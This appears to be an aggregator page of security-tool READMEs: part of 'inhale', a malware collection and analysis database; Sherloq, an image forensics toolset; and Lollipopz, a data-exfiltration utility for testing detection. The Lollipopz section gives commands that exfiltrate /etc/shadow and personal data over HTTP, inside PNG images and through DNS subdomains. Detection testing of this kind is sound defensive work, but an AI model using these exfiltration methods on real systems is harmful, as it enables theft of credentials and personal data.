python3 inhale.py -f /bin/ls -i 
Add directory 'malwarez' to database
python3 inhale.py -d malwarez
Download this file and add to the database
python3 inhale.py -u https://thugcrowd.com/chal/skull
Download everything in this remote directory, tag it all as "phishing":
python3 inhale.py -r http://someurl.com/opendir/ -t phishing
PROTIP: Use this Twitter hashtag search to find interesting open directories that possibly contain malware. Use at your own risk.

Yara
You can pass your own yara rules with -y, this is a huge work in progress and almost everything in "YaraRules" is from https://github.com/kevthehermit/PasteHunter/tree/master/YaraRules. Shoutout @KevTheHermit

Querying the Database
Use db.sh to query (Soon to be a nice script)
db.sh *something* | jq .

Data Model
The following is the current data model used for the elasticsearch database. Not every one of these will be used for every given file. Any r2_* tags are typically reserved for binaries of some sort.
NameDescription
filenameThe full path of the binary
file_extThe file extension
filesizeThe file size
filetypeFiletype based on magic value. Not as reliable as binwalk signatures.
md5The files MD5 hash
sha1The files SHA1 hash
sha256The files SHA256 hash
addedThe date the file was added
r2_archArchitecture of the binary file
r2_baddrThe binary's base address
r2_binszThe size of the program code
r2_bitsArchitecture bits - 8/16/32/64 etc.
r2_canaryWhether or not stack canaries are enabled
r2_classBinary Class
r2_compiledThe date that the binary was compiled
r2_dbg_fileThe debug file of the binary
r2_intrpThe interpreter that the binary calls if dynamically linked
r2_langThe language of the source code
r2_lsymsWhether or not there are debug symbols
r2_machineThe machine type, usually means the CPU the binary is for
r2_osThe OS that the machine is supposed to run on
r2_picWhether or not there is Position Independent Code
r2_relocsWhether or not there are relocations
r2_rpathThe run-time search path - if applicable
r2_strippedWhether or not the binary is stripped
r2_subsysThe binary's subsystem
r2_formatThe binary format
r2_iorwWhether ioctl calls are present
r2_typeThe binary type, whether or not it's an executable, shared object etc.
yaraContains a list of yara matches
binwalkContains a list of binwalk signatures and their locations in the binary
tagsAny user defined tags passed with the -t flag.
urlThe origin url if a file was remotely downloaded
urlsAny URLs that have been pulled from the binary

Solutions to Issues
There are some known issues with this project (mainly to do with versions from package managers), and here I will track anything that has a solution for it.

ElasticSearch index field limit
If you get an error like this:
elasticsearch.exceptions.RequestError: RequestError(400, 'illegal_argument_exception', 'Limit of total fields [1000] in index [inhaled] has been exceeded')
You may have an older version of elasticSearch. You can upgrade, or you can increase the fields limit with this one liner.
curl -XPUT 'localhost:9200/inhaled/_settings' -H 'Content-Type: application/json' -d'{ "index" : { "mapping" : { "total_fields" : { "limit" : "100000" }}}}'

Future Features
  • Re-doing the bot plugin for Discord / Matrix
  • Additional binary analysis features - pulling import/export tables, hashing of specific structures in the header, logging all strings etc.
  • Checking if the file is the database before adding. This feature was removed previously due to specific issues with older versions of ES.
  • Configuration options for requests such as: user agent, timeout, proxy etc.
  • Dockerization of this entire project.

Contribution
PRs are welcome! If you want to give specific feedback, you can also DM me @netspooky on Twitter.

Thanks
I'd like to thank everyone who helped to test this tool with me. I'd also like to thank Plazmaz for doing an initial sweep of the code to make it a bit neater.
Greetz to: hermit, plazmaz, nux, x0, dustyfresh, aneilan, sshell, readme, dnz, notdan, rqu, specters, nullcookies, ThugCrowd, and everyone involved with ThreatLand and the TC Safari Zone.


Sherloq - An Open-Source Digital Image Forensic Toolset

$
0
0


An open source image forensic toolset

Introduction
"Forensic Image Analysis is the application of image science and domain expertise to interpret the content of an image and/or the image itself in legal matters. Major subdisciplines of Forensic Image Analysis with law enforcement applications include: Photogrammetry, Photographic Comparison, Content Analysis, and Image Authentication." (Scientific Working Group on Imaging Technologies)
Sherloq is a personal research project about implementing a fully integrated environment for digital image forensics. It is not meant as an automatic tool that decide if an image is forged or not (that tool probably will never exist...), but as a companion in putting at work various algorithms to discover potential image inconsistencies.
While many commercial solutions have unaffordable prices and are reserved to law enforcement and government agencies only, this toolset aims to be both a powerful and extensible framework providing a starting point for anyone interested in testing or developing state-of-the-art forensic algorithms.
I strongly believe that security-by-obscurity is the wrong way to offer any kind of security service (i.e. "Using this proprietary software I guarantee you that this photo is pristine... and you have to trust me!"). Instead, following the open-source mentality, everyone should be able to personally experiment various techniques, gain more knowledge and share it to the community... even better if they propose code improvements! :)

Features
A Qt-based GUI provides highly responsive widgets for panning, zooming and inspecting images, while all image processing routines are handled by OpenCV for best efficiency. The software is based on a multi-document interface that can use floating or tabbed view for subwindows and tool outputs can be exported in various textual and graphical formats.
These are the currently planned functions [(***) = fully implemented, (**) = partially implemented, (*) = not yet implemented]:

General
  • Original Image: display the unaltered reference image for visual inspection (***)
  • Image Digest: compute byte and perceptual hashes together with extension ballistics (**)
  • Similarity Search: use reverse search services for finding similar images on the web (*)
  • Automatic Tagging: exploit deep learning algorithms for automatic picture tagging (*)

File
  • Metadata Dump: gather all metadata information and display security warnings (**)
  • EXIF Structure: dump the physical EXIF structure and display an interactive view (***)
  • Thumbnail Analysis: if present, extract embedded thumbnail and highlight discrepancies (***)
  • Geolocation Data: if present, get geographic data and locate them on a world map view (***)

Inspection
  • Enhancing Magnifier: apply local visual enhancements for better identifying forgeries (***)
  • Image Adjustments: apply standard adjustments (contrast, brightness, hue, saturation, ...) (***)
  • Tonal Range Sweep: interactive tonality range compression for easier artifact detection (***)
  • Reference Comparison: synchronized double view to compare reference and evidence images (***)

JPEG
  • Quality Estimation: extract quantization tables and estimate last saved JPEG quality (***)
  • Compression Ghosts: use error residuals to detect multiple compressions at different levels (**)
  • Double Compression: exploit First Digit Statistics to discover potential double compression (**)
  • Error Level Analysis: identify areas with different compression levels against a fixed quality (***)

Colors
  • RGB/HSV 3D Plots: display interactive 2D and 3D plots of RGB and HSV pixel data (*)
  • Color Space Conversion: convert image into RGB/HSV/YCbCr/Lab/CMYK color spaces (***)
  • Principal Component Analysis: use PCA to project RGB values onto a different vector space (***)
  • RGB Pixel Statistics: compute minimum/maximum/average RGB values for every pixel (***)

Luminance
  • Luminance Gradient: analyze brightness variations along X/Y axes of the image (***)
  • Frequency Separation: extract the finest details of the luminance channel (*)
  • Echo Edge Filter: use 2D Laplacian filter to reveal artificial blurred zones (***)
  • Wavelet Reconstruction: re-synthesize image varying wavelet coefficient thresholds (*)

Noise
  • Noise Extraction: estimate and separate the natural noise component of the image (***)
  • Min/Max Deviation: highlight pixels deviating from block-based min/max statistics (***)
  • SNR Consistency: evaluate uniformity of signal-to-noise ratio across the image (***)
  • Noise Segmentation: cluster uniform noise areas for easier tampering detection (*)

Tampering
  • Contrast Enhancement: analyze histogram inconsistencies caused by enhancements (***)
  • Clone Detection: use invariant feature descriptors for copy/rotate clone area detection (**)
  • Resampling Detection: analyze 2D pixel interpolation for detecting resampling traces (**)
  • Splicing Detection: use DCT coefficient statistics for automatic splicing zone detection (*)

Setup
The software is written in C++11 using Qt Framework for platform-independent GUI and OpenCV Library for efficient image processing. Other external depencies are ExifTool for metadata extraction, LIBSVM for forgery detection and AlgLib for histogram manipulation.
Even if the project objective is clear, actually the software is an early prototype, so some functionalities are still missing (see list above) and it can be run only from Qt Creator under Linux. I put it on Github to track my development progress even during the alpha stage, so expect issues, bugs and installation headaches, however, if you want to take a look around, feel free to contact me if you are experiencing problems in making it run.

Screenshots

File Analysis: Metadata, Digest and EXIF

 Color Analysis: Space Conversion, PCA Projection, Histograms and Statistics

Visual Inspection: Magnifier Loupe, Image Adjustments and Evidence Comparison

JPEG Analysis: Quantization Tables, Compression Ghosts and Error Level Analysis

Luminance and Noise: Light Gradient, Echo Edge, Min/Max Deviation and SNR Consistency


Lollipopz - Data Exfiltration Utility For Testing Detection Capabilities

$
0
0

Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only.

Exfiltration How-To

/etc/shadow -> HTTP GET requests

Server
# ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETServer -lp 80 -o output.log

Client
$ ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r

/etc/shadow -> HTTP POST requests

Server
# ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.POSTServer -lp 80 -o output.log

Client
$ ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.POSTClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r

PII -> PNG embedded in HTTP Response

Server
$ ./lollipopz-cli.py -m lollipopz.methods.http.image_response.Server -lp 37650 -o output.log

Client
# ./lollipopz-cli.py -m lollipopz.methods.http.image_response.Client -rh 127.0.0.1 -rp 37650 -lp 80 -i ./samples/pii.txt -r

PII -> DNS subdomains querying

Server
# ./lollipopz-cli.py -m lollipopz.methods.dns.subdomain_cipher.Server -lp 53 -o output.log

Client
$ ./lollipopz-cli.py -m lollipopz.methods.dns.subdomain_cipher.Client -rh 127.0.0.1 -rp 53 -i ./samples/pii.txt -r


Viewing all 5816 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>